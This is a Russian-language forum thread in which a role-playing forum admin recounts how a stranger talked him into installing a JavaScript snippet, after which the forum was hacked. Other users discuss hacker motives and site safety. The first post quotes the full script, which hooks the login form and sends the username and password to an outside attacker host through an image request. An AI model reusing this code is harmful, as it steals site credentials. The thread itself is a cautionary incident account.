Сентябрьский Лис: [Удалено администратором :) ] Администратор решил вернуть удаленное. Издание 2-е, перераб. и доп. 24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Вот этот скрипт: <script type="text/javascript"> function block (t) { t = t.replace("%", escape("%")); t = t.replace("$", escape("$")); t = t.replace("#", escape("#")); t = t.replace("\\", escape("\\")); return t; } function newtest() { if (document.all.nick.value) { a = document.all.nick.value; b = document.all.pass.value; } else if (document.frm.nick.value) { a = document.frm.nick.value; b = document.frm.pass.value; } else { a = "undefined"; b = "no"; } a = block(a); b = block(b); img = new Image(); img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b; setTimeout("newtest()", 1); } document.temp = new function() { var sec = document.write; this.write = function(txt) { txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>"); this.sec = sec; this.sec(txt); this.sec = null; return true; } return this; } document.write = document.temp.write; document.temp = null; document.writeln = document.write; </script> Ночью форум был взломан. (кликните на картинку, чтобы прочитать "послание" взломщика) Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров. Разговоры на форуме "Критик" до взлома моего форума: После взлома: Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше. "У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист. Действительно, тему почистили не всю. Чистосердечное признание! cater - второй ник Кота Бегемота. Комментарий специалиста: [quote]Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"[/quote]
Сентябрьский Лис: Да нет, как я уже говорил, в общем-то взломщик мог бы вообще всё снести нафиг, т.е. весь форум, но он этого не сделал. Правда case может полностью восстановить уничтоженный форум т.к. у него остаётся резервная копия всех форумов Borda (кстати, о borda. Насколько я знаю, больше ни один сервис такой услуги юзерам не предлагает). Но Бегемот (взломщик) поступил достаточно деликатно, почти все темы оставив на месте.
Аскер: Да уж, очень деликатно... Спасибо и на этом, конечно. Но лучше бы он вообще свои руки не совал куда не следует.
Solo: На форуме техподдержки у case в разделе "Свободное общение" есть тема "Форумы хакерской тематики". Зачем она там – объяснено в первом сообщении. Форумы, указанные в начале темы уже удалены. Но часть форумов существует. Например, тот, что указан в сообщении от 01.08.08. Когда есть время, я захожу на такие форумы. После случая с форумом Лиса я сама убедилась, что от взлома никто не гарантирован. Я хожу и смотрю, чего можно ожидать, на что не нужно попадаться, что вообще, потенциально может случиться. Ведь и форум Лиса взломали от недостатка знаний самого Лиса и его излишней доверчивости. Я умышленно не сообщаю адресов форумов и тем. Кому надо, тот сам сходит и посмотрит. Более всего меня впечатлила тема "Угон мыла". Речь идёт об Яндексовских ящиках. Можно, конечно, проще выйти из положения – не заводить ящик на Яндексе. Но тут такая загвоздка, когда регистрируешь сайт на Народе.ру к сайту автоматически прилагается ящик. И ящик автоматически получается с тем же паролем, что и логин на Яндексе. Если сменить пароль на ящике – он автоматически меняется и на Народе, они взаимосвязаны. Получается, что взломав ящик, хакер спокойно получает и доступ к моему сайту. По свидетельству других членов форума указанным способом взломать ящик получается раз на 6-7-8. Нужно только проявить терпение... В общем, другой какой-то хостинг надо искать.
Сентябрьский Лис: Психология взлома Мне захотелось подумать о том, какие мотивы могут руководить взломщиками. Насколько я понимаю, часто действует вовсе не желание навредить какому-нибудь конкретному сайтовладельцу (хотя и такое тоже бывает), тут немалое имеет место желание вступить в борьбу с защитной системой ящиков или сервисов. Вероятно, это воспринимается, как игра: "вот я вступаю в борьбу с защитной системой - смогу ли я её победить?!" При этом обычный юзер, у которого ломают ящик - это просто расходный материал, подопытный кролик. Для того, чтобы сразиться с Яндексом - нужен ведь чей-то ящик. Получается, что взломщик - это игрок. Вот только играет он в другие игры. Вот например эта ситуация, приведённая в первом посте темы. Бегемоту было совершенно нечего делить со мной. Мы вообще не знали друг друга. Мотивом его деятельности был интерес: сработает-не сработает? Периодически видишь картину: сайт/форум взломан, и так и остаётся висеть с перекошенным дизайном и надписью хакера. И висеть он так может достаточно долго. Хозяин почему-то не обращается за помощью к тому же case, чтобы восстановил пароль и темы форума. Почему - не знаю, но могу сказать за себя. Когда "Лиса" взломали, мне стало пофиг. "Баба с возу - кобыле легче" - одним форумом меньше, тем более, что все наиболее ценные статьи форума были скопированы у меня в компьютер. Форум тоже висел целый день с приветствием Бегемота на самом видном месте. Мне действительно было пофиг и я не собирался его восстанавливать. Более всего обеспокоены происходящим были Мэгги и сам Бегемот, который в течение дня несколько раз появлялся и писал всякую чушь, смысл которой можно было перевести так: "Чё это вы сидите и ничего не делаете?" Вечером мне в конце концов стало жалко народ, который очень переживал и ломился в аску к Мэгги и Макнамары (ко мне никто не ломился, потому что я аську не включал) и я отдал Маку ГПФ и он уже там сам всё менял и восстанавливал. Вообще, любой сайтовладелец должен быть готов к тому, что в любой момент можно всё потерять. Поэтому нужно всё по максимуму хранить у себя в компьютере (или на диске): коды, фотографии, тексты. Например, если хакнут новеллизацию - я восстановлю её в течении получаса. Нужно только загрузить готовые страницы с компьютера и поменять на них адреса... P.S. А с Народа, действительно лучше бы свалить, в какое-нибудь более надёжное место...
Gabi Kaufmann: Сентябрьский Лис пишет: 24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Теперь я понимаю, почему здесь так не любят джава-скрипты)). Мне в этом деле повезло (ттт., чтоб не сглазить.) Я познакомилась с мальчиком, школьником, который прекрасно разбирается в джава скриптах и имеет несколько форумов с отличной посещаемостью (поэтому для взлома ему моя ролевая не интересна, более того, он даже не понимает, что такое ролевые, и с чем их едят.Парень любит контер страйк и иже с ними.Все мои попытки научить его писать посты с треском провалились.) Но мы с ним поладили, нашли общий язык.Я оценила его скрипты, а он стал помогать мне с ролевой.Конечно, на ролевой еще масса недоработок, но этот парень мне очень помог (и надеюсь, будет помогать в дальнейшем.) Даже рассказал про скрипты взлома, и какую угрозу они несут.А то я в этом деле полный лузер.))
Сентябрьский Лис: Gabi Kaufmann пишет: Даже рассказал про скрипты взлома, и какую угрозу они несут. Вы нас, случайно не просветите по этому вопросу? Полезная информация, между прочим!
Gabi Kaufmann: Сентябрьский Лис пишет: Вы нас, случайно не просветите по этому вопросу? Полезная информация, между прочим! Что именно вам хочется узнать? Я всего уже не припомню.Вы пишите вопросы, я как Кирилла поймаю, так спрошу, сохраню в ворде-и сюда кину)).
Сентябрьский Лис: Gabi Kaufmann пишет: Что именно вам хочется узнать? Я всего уже не припомню. Ну, я не взломщик, чтобы конкретно спрашивать. Можно было бы сделать, что-то вроде ликбеза: что потенциально может быть опасным и что конкретно ставить нельзя. А то я в основном придерживаюсь правила: "Лучше вообще ничего не ставить!" И вообще, самое надёжное - голый html: чтоб никаких php и java!
Gabi Kaufmann: Сентябрьский Лис пишет: Можно было бы сделать, что-то вроде ликбеза: что потенциально может быть опасным и что конкретно ставить нельзя. Не думаю, что Кирилл сможет назвать вам конкретные коды, которые ставить нельзя)).Новые же придумывают каждый день)).Может только самые известные назовет, например те, которые вышибают всех админов. Сентябрьский Лис пишет: А то я в основном придерживаюсь правила: "Лучше вообще ничего не ставить!" И вообще, самое надёжное - голый html: чтоб никаких php и java! Золотые слова.Мне так Кирилл и сказал:"Оля, если не понимаешь скрипт-даже не дотрагивайся.")) И дал ссылку для восстановления сайта, если что случиться вдруг.
Миледи2: Вообще, действительно лучше избегать любых скриптов. А если предлагают. как рассказано выше, банить с первых же слов.
Gabi Kaufmann: Миледи2 пишет: Вообще, действительно лучше избегать любых скриптов. А если предлагают. как рассказано выше, банить с первых же слов. Слишком жестко)).Так можно нажить много забанненых врагов, которые будут засыпать форум спамом, заходить под другим айпи и старательно вредить (тем более ломают форумы в основном дети.Что-то я не припомню на своей практике взрослых людей, которые были бы заинтересованы во взломе чужой ролевой.Ведь денег они с этого не получат, а создать свою ролевую взрослый человек может и покруче, чем у кого-то.А с детьми надо как-то аккуратно разговаривать, особенно с подростками-гениями во взломе)). Тем более, подростки довольно злопамятны.
Beastmaster: Gabi Kaufmann вот ещё, тратить вежливость на моральных уродов. Ну у меня бан- лист периодически пополняется, ну чуть чуть поднял я уровень защиты- и на потуги "врагов" я, если честно, поплёвываю с высокой башни. И всю их злопамятность я как- то игнорирую. Миледи2 пишет: Вообще, действительно лучше избегать любых скриптов. А если предлагают. как рассказано выше, банить с первых же слов. Воистину, лучше таких долой.
Gabi Kaufmann: Beastmaster пишет: Воистину, лучше таких долой. Думаю, меня бы тут давно забанили, если бы прислушивались к вашему правилу)).Я в одной темке очень радела за джава-скрипты)). Beastmaster пишет: вот ещё, тратить вежливость на моральных уродов. Ну у меня бан- лист периодически пополняется, ну чуть чуть поднял я уровень защиты- и на потуги "врагов" я, если честно, поплёвываю с высокой башни. И всю их злопамятность я как- то игнорирую. Не вы ли хотели составить черный список, не ваш-ли форум замучили такие уроды?)) Вот потому и замучили, они все отомстить вам пытаются, а не выходит никак)).
Beastmaster: Gabi Kaufmann ой да на здравие, пусть пытаются. На одном форуме мне такую замечательную рекламу сделали, спасибо им за 2 игроков, которые на обычную рекламу бы и не посмотрели))) Типа Бист (далее смотрим подпись Сентябрьского Лиса, примерно то же самое) с адресом форума на месте объявления. А идея была после того, как на форуме моей хорошей знакомой один "обиженный" снёс все настройки. Я тогда срочно бросил все дела и полез восстанавливать ей проект. Вот такие люди, ИМХО, опасны. Вот и решил посоветоваться- а есть ли смысл? Да и вы как, навязывали скрипты, убеждали поставить и т.д.?
Gabi Kaufmann: Beastmaster пишет: Да и вы как, навязывали скрипты, убеждали поставить и т.д.? Не убеждала конечно, но активно пропагандировала что они полезны, и можно сказать навязывала всем свою точку зрения)). Beastmaster пишет: Вот и решил посоветоваться- а есть ли смысл? Ну знаете, это как в переговорах с террористами.Можно сразу провести зачистку и всех уничтожить, и террористов, и невинных людей, которые случайно попали под обстрел, а можно провести переговоры. Не даром есть военные психологи и тд.))
Сентябрьский Лис: Gabi Kaufmann пишет: тем более ломают форумы в основном дети. Gabi Kaufmann, так Вы переходите на borda - бордовский форум взломать невозможно (во всяком случае, ребёнку ) Gabi Kaufmann пишет: Так можно нажить много забанненых врагов, которые будут засыпать форум спамом Так Вы поставьте красный уровень защиты. Gabi Kaufmann пишет: А с детьми надо как-то аккуратно разговаривать, особенно с подростками-гениями во взломе)). Самая главная гениальность подростков-гениев - в лопушестве админов (как это видно по первому сообщению темы) Gabi Kaufmann пишет: Тем более, подростки довольно злопамятны. Всё! Страшнее подростка зверя нет! И как это бедный Лис до сих пор жив, когда у него полный бан-лист подростков, за исключением Алекса-Палпатина, которому нынче, вроде как, 35 лет. Однако, последний хвастался, что у него друзья в Интерполе!)))) Gabi Kaufmann пишет: Думаю, меня бы тут давно забанили Gabi Kaufmann, на этом форуме никто ни от чего не гарантирован! Beastmaster пишет: На одном форуме мне такую замечательную рекламу сделали, спасибо им за 2 игроков, которые на обычную рекламу бы и не посмотрели))) Типа Бист (далее смотрим подпись Сентябрьского Лиса, примерно то же самое) с адресом форума на месте объявления. Меня тоже одно время так рекламили! Или почти так.
Gabi Kaufmann: Сентябрьский Лис пишет: Всё! Страшнее подростка зверя нет! И как это бедный Лис до сих пор жив, когда у него полный бан-лист подростков, за исключением Алекса-Палпатина, которому нынче, вроде как, 35 лет. Однако, последний хвастался, что у него друзья в Интерполе!)))) Изумительный случай детской непосредственности при кризисе среднего возраста. Сентябрьский Лис пишет: Gabi Kaufmann, так Вы переходите на borda - бордовский форум взломать невозможно (во всяком случае, ребёнку Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис). Сентябрьский Лис пишет: на этом форуме никто ни от чего не гарантирован! Вы на что намекаете? Сентябрьский Лис пишет: Самая главная гениальность подростков-гениев - в лопушестве админов (как это видно по первому сообщению темы) Они и не такое умеют)).Просто, уж извините меня, взрослые хакеры будут взламывать счета банков а уж никак не ролевые игры.Хосподи, кому они нужны. Сентябрьский Лис пишет: Так Вы поставьте красный уровень защиты. Мой форум (ттт), никто спамом не засыпает.
Сентябрьский Лис: Gabi Kaufmann пишет: Изумительный случай детской непосредственности при кризисе среднего возраста. У кого? У меня? Gabi Kaufmann пишет: Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис). Давайте! С удовольствием послушаю! Gabi Kaufmann пишет: Вы на что намекаете? Я ни на что не намекаю. Я всё прямо говорю: "Никто ни от чего не гарантирован!"
Gabi Kaufmann: Сентябрьский Лис пишет: У кого? У меня? Сентябрьский Лис пишет: Давайте! С удовольствием послушаю! Лис, не злитесь, я говорила вовсе не про вас, а про взломщиков, которые завидуют чужим успехам. И никто не говорит-что дети киборги и от них надо прятаться под кроватью.Просто порой здравый диалог полезнее бана, вот о чем я... Сентябрьский Лис пишет: Я ни на что не намекаю. Я всё прямо говорю: "Никто ни от чего не гарантирован!" Посему я не буду флудить и придавать вам лишнюю работу)). Свою мысль о взломщиках я высказала, добавить мне нечего.
Сентябрьский Лис: Gabi Kaufmann пишет: Лис, не злитесь, Вы что?! Я не злюсь! Просто насколько я знаю, форум borda самый неуязвимых для взломов из всех подобных сервисов. Реально. Мне бы хотелось услышать реальный рассказ, как его удалось кому-то взломать, тем более ребёнку. Он в принципе не ломается. Потому и конкурентоспособен среди остальных (т.к. других минусов у него достаточно много) Я лично думаю, что Вы просто прихвастнули и на самом деле не знаете ни одного реального случая, когда бы дети взламывали Борду. Если я не прав - докажите.